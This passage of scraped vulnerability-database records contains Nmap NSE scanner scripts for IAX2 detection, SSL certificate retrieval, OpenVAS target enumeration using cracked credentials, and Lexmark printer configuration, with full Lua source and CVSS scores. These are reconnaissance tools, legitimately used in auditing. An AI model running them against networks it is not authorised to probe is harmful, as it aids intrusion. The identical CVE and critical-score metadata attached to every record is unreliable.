nmap.registry['duplicates']['nbstat'] = nmap.registry['duplicates']['nbstat'] or {}\n nmap.registry['duplicates']['nbstat'][host] = host.registry['nbstat']\n end\n\n if ( host.mac_addr_src ) then\n nmap.registry['duplicates']['mac'] = nmap.registry['duplicates']['mac'] or {}\n nmap.registry['duplicates']['mac'][host] = true\n end\n\n return\nend\n\nlocal Actions = {\n hostrule = hostaction,\n postrule = postaction\n}\n\n-- execute the action function corresponding to the current rule\naction = function(...) return Actions[SCRIPT_TYPE](...) end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:56", "description": "Detects the UDP IAX2 service. \n\nThe script sends an Inter-Asterisk eXchange (IAX) Revision 2 Control Frame POKE request and checks for a proper response. This protocol is used to enable VoIP connections between servers as well as client-server communication.\n\n## Example Usage \n \n \n nmap -sU -sV -p 4569 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 4569/udp closed iax2\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "iax2-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:IAX2-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/iax2-version.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\ndescription = [[\nDetects the UDP IAX2 service.\n\nThe script sends an Inter-Asterisk eXchange (IAX) Revision 2 Control Frame POKE\nrequest and checks for a proper response. This protocol is used to enable VoIP\nconnections between servers as well as client-server communication.\n]]\n\n---\n-- @usage\n-- nmap -sU -sV -p 4569 <target>\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 4569/udp closed iax2\n\nauthor = \"Ferdy Riphagen\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"version\"}\n\n\nportrule = shortport.version_port_or_service(4569, nil, \"udp\")\n\naction = function(host, port)\n -- see http://www.cornfed.com/iax.pdf for all options.\n local poke = \"\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x1e\"\n\n local status, recv = comm.exchange(host, port, poke, {timeout=10000})\n\n if not status then\n return\n end\n\n if (#recv) == 12 then\n local byte11 = string.byte(recv, 11)\n local byte12 = string.byte(recv, 12)\n\n -- byte11 must be \\x06 IAX Control Frame\n -- and byte12 must be \\x03 or \\x04\n if ((byte11 == 6) and\n (byte12 == 3 or byte12 == 4))\n then\n nmap.set_port_state(host, port, \"open\")\n port.version.name = \"iax2\"\n nmap.set_port_version(host, port)\n end\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:06", "description": "Retrieves a server's SSL certificate. The amount of information printed about the certificate depends on the verbosity level. With no extra verbosity, the script prints the validity period and the commonName, organizationName, stateOrProvinceName, and countryName of the subject. \n \n \n 443/tcp open https\n | ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n /stateOrProvinceName=California/countryName=US\n | Not valid before: 2011-03-23 00:00:00\n |_Not valid after: 2013-04-01 23:59:59\n\nWith `-v` it adds the issuer name and fingerprints. \n \n \n 443/tcp open https\n | ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n /stateOrProvinceName=California/countryName=US\n | Issuer: commonName=VeriSign Class 3 Extended Validation SSL CA\\\n /organizationName=VeriSign, Inc./countryName=US\n | Public Key type: rsa\n | Public Key bits: 2048\n | Signature Algorithm: sha1WithRSAEncryption\n | Not valid before: 2011-03-23 00:00:00\n | Not valid after: 2013-04-01 23:59:59\n | MD5: bf47 ceca d861 efa7 7d14 88ad 4a73 cb5b\n |_SHA-1: d846 5221 467a 0d15 3df0 9f2e af6d 4390 0213 9a68\n\nWith `-vv` it adds the PEM-encoded contents of the entire certificate. \n \n \n 443/tcp open https\n | ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n /stateOrProvinceName=California/countryName=US/1.3.6.1.4.1.311.60.2.1.2=Delaware\\\n /postalCode=95131-2021/localityName=San Jose/serialNumber=3014267\\\n /streetAddress=2211 N 1st St/1.3.6.1.4.1.311.60.2.1.3=US\\\n /organizationalUnitName=PayPal Production/businessCategory=Private Organization\n | Issuer: commonName=VeriSign Class 3 Extended Validation SSL CA\\\n /organizationName=VeriSign, Inc./countryName=US\\\n /organizationalUnitName=Terms of use at https://www.verisign.com/rpa (c)06\n | Public Key type: rsa\n | Public Key bits: 2048\n | Signature Algorithm: sha1WithRSAEncryption\n | Not valid before: 2011-03-23 00:00:00\n | Not valid after: 2013-04-01 23:59:59\n | MD5: bf47 ceca d861 efa7 7d14 88ad 4a73 cb5b\n | SHA-1: d846 5221 467a 0d15 3df0 9f2e af6d 4390 0213 9a68\n | -----BEGIN CERTIFICATE-----\n | MIIGSzCCBTOgAwIBAgIQLjOHT2/i1B7T//819qTJGDANBgkqhkiG9w0BAQUFADCB\n ...\n | 9YDR12XLZeQjO1uiunCsJkDIf9/5Mqpu57pw8v1QNA==\n |_-----END CERTIFICATE-----\n\n### See also:\n\n * [ ssl-cert-intaddr.nse ](<../scripts/ssl-cert-intaddr.html>)\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n 443/tcp open https\n | ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n /stateOrProvinceName=California/countryName=US\n | Not valid before: 2011-03-23 00:00:00\n |_Not valid after: 2013-04-01 23:59:59\n \n\n## Requires \n\n * [datetime](<../lib/datetime.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [shortport](<../lib/shortport.html>)\n * [sslcert](<../lib/sslcert.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [tls](<../lib/tls.html>)\n * [unicode](<../lib/unicode.html>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-11-24T08:49:02", "type": "nmap", "title": "ssl-cert NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-01-16T19:12:59", "id": "NMAP:SSL-CERT.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-cert.html", "sourceData": "local datetime = require \"datetime\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal shortport = require \"shortport\"\nlocal sslcert = require \"sslcert\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tls = require \"tls\"\nlocal unicode = require \"unicode\"\nlocal have_openssl, openssl = pcall(require, \"openssl\")\n\ndescription = [[\nRetrieves a server's SSL certificate. The amount of information printed\nabout the certificate depends on the verbosity level. With no extra\nverbosity, the script prints the validity period and the commonName,\norganizationName, stateOrProvinceName, and countryName of the subject.\n\n<code>\n443/tcp open https\n| ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n/stateOrProvinceName=California/countryName=US\n| Not valid before: 2011-03-23 00:00:00\n|_Not valid after: 2013-04-01 23:59:59\n</code>\n\nWith <code>-v</code> it adds the issuer name and fingerprints.\n\n<code>\n443/tcp open https\n| ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n/stateOrProvinceName=California/countryName=US\n| Issuer: commonName=VeriSign Class 3 Extended Validation SSL CA\\\n/organizationName=VeriSign, Inc./countryName=US\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2011-03-23 00:00:00\n| Not valid after: 2013-04-01 23:59:59\n| MD5: bf47 ceca d861 efa7 7d14 88ad 4a73 cb5b\n|_SHA-1: d846 5221 467a 0d15 3df0 9f2e af6d 4390 0213 9a68\n</code>\n\nWith <code>-vv</code> it adds the PEM-encoded contents of the entire\ncertificate.\n\n<code>\n443/tcp open https\n| ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n/stateOrProvinceName=California/countryName=US/1.3.6.1.4.1.311.60.2.1.2=Delaware\\\n/postalCode=95131-2021/localityName=San Jose/serialNumber=3014267\\\n/streetAddress=2211 N 1st St/1.3.6.1.4.1.311.60.2.1.3=US\\\n/organizationalUnitName=PayPal Production/businessCategory=Private Organization\n| Issuer: commonName=VeriSign Class 3 Extended Validation SSL CA\\\n/organizationName=VeriSign, Inc./countryName=US\\\n/organizationalUnitName=Terms of use at https://www.verisign.com/rpa (c)06\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2011-03-23 00:00:00\n| Not valid after: 2013-04-01 23:59:59\n| MD5: bf47 ceca d861 efa7 7d14 88ad 4a73 cb5b\n| SHA-1: d846 5221 467a 0d15 3df0 9f2e af6d 4390 0213 9a68\n| -----BEGIN CERTIFICATE-----\n| MIIGSzCCBTOgAwIBAgIQLjOHT2/i1B7T//819qTJGDANBgkqhkiG9w0BAQUFADCB\n...\n| 9YDR12XLZeQjO1uiunCsJkDIf9/5Mqpu57pw8v1QNA==\n|_-----END CERTIFICATE-----\n</code>\n]]\n\n---\n-- @see ssl-cert-intaddr.nse\n--\n-- @output\n-- 443/tcp open https\n-- | ssl-cert: Subject: commonName=www.paypal.com/organizationName=PayPal, Inc.\\\n-- /stateOrProvinceName=California/countryName=US\n-- | Not valid before: 2011-03-23 00:00:00\n-- |_Not valid after: 2013-04-01 23:59:59\n--\n-- @xmloutput\n-- <table key=\"subject\">\n-- <elem key=\"1.3.6.1.4.1.311.60.2.1.2\">Delaware</elem>\n-- <elem key=\"1.3.6.1.4.1.311.60.2.1.3\">US</elem>\n-- <elem key=\"postalCode\">95131-2021</elem>\n-- <elem key=\"localityName\">San Jose</elem>\n-- <elem key=\"serialNumber\">3014267</elem>\n-- <elem key=\"countryName\">US</elem>\n-- <elem key=\"stateOrProvinceName\">California</elem>\n-- <elem key=\"streetAddress\">2211 N 1st St</elem>\n-- <elem key=\"organizationalUnitName\">PayPal Production</elem>\n-- <elem key=\"commonName\">www.paypal.com</elem>\n-- <elem key=\"organizationName\">PayPal, Inc.</elem>\n-- <elem key=\"businessCategory\">Private Organization</elem>\n-- </table>\n-- <table key=\"issuer\">\n-- <elem key=\"organizationalUnitName\">Terms of use at https://www.verisign.com/rpa (c)06</elem>\n-- <elem key=\"organizationName\">VeriSign, Inc.</elem>\n-- <elem key=\"commonName\">VeriSign Class 3 Extended Validation SSL CA</elem>\n-- <elem key=\"countryName\">US</elem>\n-- </table>\n-- <table key=\"pubkey\">\n-- <elem key=\"type\">rsa</elem>\n-- <elem key=\"bits\">2048</elem>\n-- <elem key=\"modulus\">DF40CCF2C50A0D65....35B5927DF25D4DE5</elem>\n-- <elem key=\"exponent\">65537</elem>\n-- </table>\n-- <elem key=\"sig_algo\">sha1WithRSAEncryption</elem>\n-- <table key=\"validity\">\n-- <elem key=\"notBefore\">2011-03-23T00:00:00+00:00</elem>\n-- <elem key=\"notAfter\">2013-04-01T23:59:59+00:00</elem>\n-- </table>\n-- <elem key=\"md5\">bf47cecad861efa77d1488ad4a73cb5b</elem>\n-- <elem key=\"sha1\">d8465221467a0d153df09f2eaf6d439002139a68</elem>\n-- <elem key=\"pem\">-----BEGIN CERTIFICATE-----\n-- MIIGSzCCBTOgAwIBAgIQLjOHT2/i1B7T//819qTJGDANBgkqhkiG9w0BAQUFADCB\n-- ...\n-- 9YDR12XLZeQjO1uiunCsJkDIf9/5Mqpu57pw8v1QNA==\n-- -----END CERTIFICATE-----\n-- </elem>\n\nauthor = \"David Fifield\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = { \"default\", \"safe\", \"discovery\" }\ndependencies = {\"https-redirect\"}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\n-- Find the index of a value in an array.\nfunction table_find(t, value)\n local i, v\n for i, v in ipairs(t) do\n if v == value then\n return i\n end\n end\n return nil\nend\n\nfunction date_to_string(date)\n if not date then\n return \"MISSING\"\n end\n if type(date) == \"string\" then\n return string.format(\"Can't parse; string is \\\"%s\\\"\", date)\n else\n return datetime.format_timestamp(date)\n end\nend\n\n-- These are the subject/issuer name fields that will be shown, in this order,\n-- without a high verbosity.\nlocal NON_VERBOSE_FIELDS = { \"commonName\", \"organizationName\",\n\"stateOrProvinceName\", \"countryName\" }\n\n-- Test to see if the string is UTF-16 and transcode it if possible\nlocal function maybe_decode(str)\n -- If length is not even, then return as-is\n if #str < 2 or #str % 2 == 1 then\n return str\n end\n if str:byte(1) > 0 and str:byte(2) == 0 then\n -- little-endian UTF-16\n return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)\n elseif str:byte(1) == 0 and str:byte(2) > 0 then\n -- big-endian UTF-16\n return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)\n else\n return str\n end\nend\n\nfunction stringify_name(name)\n local fields = {}\n local _, k, v\n if not name then\n return nil\n end\n for _, k in ipairs(NON_VERBOSE_FIELDS) do\n v = name[k]\n if v then\n fields[#fields + 1] = string.format(\"%s=%s\", k, maybe_decode(v) or '')\n end\n end\n if nmap.verbosity() > 1 then\n for k, v in pairs(name) do\n -- Don't include a field twice.\n if not table_find(NON_VERBOSE_FIELDS, k) then\n if type(k) == \"table\" then\n k = table.concat(k, \".\")\n end\n fields[#fields + 1] = string.format(\"%s=%s\", k, maybe_decode(v) or '')\n end\n end\n end\n return table.concat(fields, \"/\")\nend\n\nlocal function name_to_table(name)\n local output = {}\n for k, v in pairs(name) do\n if type(k) == \"table\" then\n k = table.concat(k, \".\")\n end\n output[k] = v\n end\n return outlib.sorted_by_key(output)\nend\n\nlocal function output_tab(cert)\n if not have_openssl then\n -- OpenSSL is required to parse the cert, so just dump the PEM\n return {pem = cert.pem}\n end\n local o = stdnse.output_table()\n o.subject = name_to_table(cert.subject)\n o.issuer = name_to_table(cert.issuer)\n\n o.pubkey = stdnse.output_table()\n o.pubkey.type = cert.pubkey.type\n o.pubkey.bits = cert.pubkey.bits\n -- The following fields are set in nse_ssl_cert.cc and mirror those in tls.lua\n if cert.pubkey.type == \"rsa\" then\n o.pubkey.modulus = openssl.bignum_bn2hex(cert.pubkey.modulus)\n o.pubkey.exponent = openssl.bignum_bn2dec(cert.pubkey.exponent)\n elseif cert.pubkey.type == \"ec\" then\n local params = stdnse.output_table()\n o.pubkey.ecdhparams = {curve_params=params}\n params.ec_curve_type = cert.pubkey.ecdhparams.curve_params.ec_curve_type\n params.curve = cert.pubkey.ecdhparams.curve_params.curve\n end\n\n if cert.extensions and #cert.extensions > 0 then\n o.extensions = {}\n for i, v in ipairs(cert.extensions) do\n local ext = stdnse.output_table()\n ext.name = v.name\n ext.value = v.value\n ext.critical = v.critical\n o.extensions[i] = ext\n end\n end\n o.sig_algo = cert.sig_algorithm\n\n o.validity = stdnse.output_table()\n for i, k in ipairs({\"notBefore\", \"notAfter\"}) do\n local v = cert.validity[k]\n if type(v)==\"string\" then\n o.validity[k] = v\n else\n o.validity[k] = datetime.format_timestamp(v)\n end\n end\n o.md5 = stdnse.tohex(cert:digest(\"md5\"))\n o.sha1 = stdnse.tohex(cert:digest(\"sha1\"))\n o.pem = cert.pem\n return o\nend\n\nlocal function output_str(cert)\n if not have_openssl then\n -- OpenSSL is required to parse the cert, so just dump the PEM\n return \"OpenSSL required to parse certificate.\\n\" .. cert.pem\n end\n local lines = {}\n\n lines[#lines + 1] = \"Subject: \" .. stringify_name(cert.subject)\n if cert.extensions then\n for _, e in ipairs(cert.extensions) do\n if e.name == \"X509v3 Subject Alternative Name\" then\n lines[#lines + 1] = \"Subject Alternative Name: \" .. e.value\n break\n end\n end\n end\n\n if nmap.verbosity() > 0 then\n lines[#lines + 1] = \"Issuer: \" .. stringify_name(cert.issuer)\n end\n\n if nmap.verbosity() > 0 then\n lines[#lines + 1] = \"Public Key type: \" .. cert.pubkey.type\n lines[#lines + 1] = \"Public Key bits: \" .. cert.pubkey.bits\n lines[#lines + 1] = \"Signature Algorithm: \" .. cert.sig_algorithm\n end\n\n lines[#lines + 1] = \"Not valid before: \" ..\n date_to_string(cert.validity.notBefore)\n lines[#lines + 1] = \"Not valid after: \" ..\n date_to_string(cert.validity.notAfter)\n\n if nmap.verbosity() > 0 then\n lines[#lines + 1] = \"MD5: \" .. stdnse.tohex(cert:digest(\"md5\"), { separator = \" \", group = 4 })\n lines[#lines + 1] = \"SHA-1: \" .. stdnse.tohex(cert:digest(\"sha1\"), { separator = \" \", group = 4 })\n end\n\n if nmap.verbosity() > 1 then\n lines[#lines + 1] = cert.pem\n end\n return table.concat(lines, \"\\n\")\nend\n\naction = function(host, port)\n host.targetname = tls.servername(host)\n local status, cert = sslcert.getCertificate(host, port)\n if ( not(status) ) then\n stdnse.debug1(\"getCertificate error: %s\", cert or \"unknown\")\n return\n end\n\n return output_tab(cert), output_str(cert)\nend\n\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:28", "description": "Attempts to retrieve the list of target systems and networks from an OpenVAS Manager server. \n\nThe script authenticates on the manager using provided or previously cracked credentials and gets the list of defined targets for each account. \n\nThese targets will be added to the scanning queue in case `newtargets` global variable is set.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n#### omp2.password, omp2.username \n\nSee the documentation for the [omp2](<../lib/omp2.html#script-args>) library. \n\n## Example Usage \n\n * nmap -p 9390 --script omp2-brute,omp2-enum-targets <target>\n \n\n * nmap -p 9390 --script omp2-enum-targets --script-args omp2.username=admin,omp2.password=secret <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 9390/tcp open openvas\n | omp2-enum-targets:\n | Targets for account admin:\n | TARGET HOSTS\n | Sales network 192.168.20.0/24\n | Production network 192.168.30.0/24\n |_ Firewall 192.168.1.254\n \n\n## Requires \n\n * [omp2](<../lib/omp2.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T23:44:16", "type": "nmap", "title": "omp2-enum-targets NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:OMP2-ENUM-TARGETS.NSE", "href": "https://nmap.org/nsedoc/scripts/omp2-enum-targets.html", "sourceData": "local omp2 = require \"omp2\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nAttempts to retrieve the list of target systems and networks from an OpenVAS Manager server.\n\nThe script authenticates on the manager using provided or previously cracked\ncredentials and gets the list of defined targets for each account.\n\nThese targets will be added to the scanning queue in case\n<code>newtargets</code> global variable is set.\n]]\n\n---\n-- @usage\n-- nmap -p 9390 --script omp2-brute,omp2-enum-targets <target>\n--\n-- @usage\n-- nmap -p 9390 --script omp2-enum-targets --script-args omp2.username=admin,omp2.password=secret <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 9390/tcp open openvas\n-- | omp2-enum-targets:\n-- | Targets for account admin:\n-- | TARGET HOSTS\n-- | Sales network 192.168.20.0/24\n-- | Production network 192.168.30.0/24\n-- |_ Firewall 192.168.1.254\n--\n\n\nauthor = \"Henri Doreau\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\ndependencies = {\"omp2-brute\"}\n\n\n\n\nportrule = shortport.port_or_service(9390, \"openvas\")\n\n\n--- Return the list of targets defined for a given user\n--\n-- @param host the target host table\n-- @param port the targeted OMP port\n-- @param username the username to use to login\n-- @param password the password to use to login\n-- @return the list of targets for this user or nil\nlocal function account_enum_targets(host, port, username, password)\n local targets\n local session = omp2.Session:new()\n\n local status, err = session:connect(host, port)\n\n if not status then\n stdnse.debug1(\"connection failure (%s)\", err)\n return nil\n end\n\n if session:authenticate(username, password) then\n targets = session:ls_targets()\n else\n stdnse.debug1(\"authentication failure (%s:%s)\", username, password)\n end\n\n session:close()\n\n return targets\nend\n\n--- Generate the output string representing the list of discovered targets\n--\n-- @param targets the list of targets as a name->hosts mapping\n-- @return the array as a formatted string\nlocal function report(targets)\n local outtab = tab.new()\n\n tab.add(outtab, 1, \"TARGET\")\n tab.add(outtab, 2, \"HOSTS\")\n tab.nextrow(outtab)\n\n for name, hosts in pairs(targets) do\n tab.addrow(outtab, name, hosts)\n end\n\n return tab.dump(outtab)\nend\n\naction = function(host, port)\n local results = {}\n local credentials = omp2.get_accounts(host)\n\n if not credentials then\n -- unable to authenticate on the server\n return \"No valid account available!\"\n end\n\n for _, account in pairs(credentials) do\n\n local username, password = account.username, account.password\n\n local targets = account_enum_targets(host, port, username, password)\n\n if targets ~= nil then\n table.insert(results, \"Targets for account \" .. username .. \":\")\n table.insert(results, report(targets))\n else\n table.insert(results, \"No targets found for account \" .. username)\n end\n\n if target.ALLOW_NEW_TARGETS and targets ~= nil then\n stdnse.debug1(\"adding new targets %s\", table.concat(targets, \", \"))\n target.add(table.unpack(targets))\n end\n\n end\n\n return stdnse.format_output(true, results)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:05", "description": "Retrieves configuration information from a Lexmark S300-S400 printer. \n\nThe Lexmark S302 responds to the NTPRequest version probe with its configuration. The response decodes as mDNS, so the request was modified to resemble an mDNS request as close as possible. However, the port (9100/udp) is listed as something completely different (HBN3) in documentation from Lexmark. See <http://www.lexmark.com/vgn/images/portal/Security%20Features%20of%20Lexmark%20MFPs%20v1_1.pdf>.\n\n## Example Usage \n \n \n nmap -sU -p 9100 --script=lexmark-config <target>\n\n## Script Output \n \n \n Interesting ports on 192.168.1.111:\n PORT STATE SERVICE REASON\n 9100/udp unknown unknown unknown-response\n | lexmark-config:\n | IPADDRESS: 10.46.200.170\n | IPNETMASK: 255.255.255.0\n | IPGATEWAY: 10.46.200.2\n | IPNAME: \"ET0020006E4A37\"\n | MACLAA: \"000000000000\"\n | MACUAA: \"0004007652EC\"\n | MDNSNAME: \"S300-S400 Series (32)\"\n | ADAPTERTYPE: 2\n | IPADDRSOURCE: 1\n | ADAPTERCAP: \"148FC000\"\n | OEMBYTE: 1 0\n | PASSWORDSET: FALSE\n | NEWPASSWORDTYPE: TRUE\n | 1284STRID: 1 \"S300-S400 Series\"\n | CPDATTACHED: 1 1\n | SECUREMODE: FALSE\n | PRINTERVIDPID: 1 \"043d0180\"\n |_ product=(S300-S400: Series)\n\n## Requires \n\n * [dns](<../lib/dns.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-29T21:04:25", "type": "nmap", "title": "lexmark-config NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:LEXMARK-CONFIG.NSE", "href": "https://nmap.org/nsedoc/scripts/lexmark-config.html", "sourceData": "local dns = require \"dns\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves configuration information from a Lexmark S300-S400 printer.\n\nThe Lexmark S302 responds to the NTPRequest version probe with its\nconfiguration. The response decodes as mDNS, so the request was modified\nto resemble an mDNS request as close as possible. However, the port\n(9100/udp) is listed as something completely different (HBN3) in\ndocumentation from Lexmark. See\nhttp://www.lexmark.com/vgn/images/portal/Security%20Features%20of%20Lexmark%20MFPs%20v1_1.pdf.\n]]\n\n\n---\n--@usage\n-- nmap -sU -p 9100 --script=lexmark-config <target>\n--@output\n-- Interesting ports on 192.168.1.111:\n-- PORT STATE SERVICE REASON\n-- 9100/udp unknown unknown unknown-response\n-- | lexmark-config:\n-- | IPADDRESS: 10.46.200.170\n-- | IPNETMASK: 255.255.255.0\n-- | IPGATEWAY: 10.46.200.2\n-- | IPNAME: \"ET0020006E4A37\"\n-- | MACLAA: \"000000000000\"\n-- | MACUAA: \"0004007652EC\"\n-- | MDNSNAME: \"S300-S400 Series (32)\"\n-- | ADAPTERTYPE: 2\n-- | IPADDRSOURCE: 1\n-- | ADAPTERCAP: \"148FC000\"\n-- | OEMBYTE: 1 0\n-- | PASSWORDSET: FALSE\n-- | NEWPASSWORDTYPE: TRUE\n-- | 1284STRID: 1 \"S300-S400 Series\"\n-- | CPDATTACHED: 1 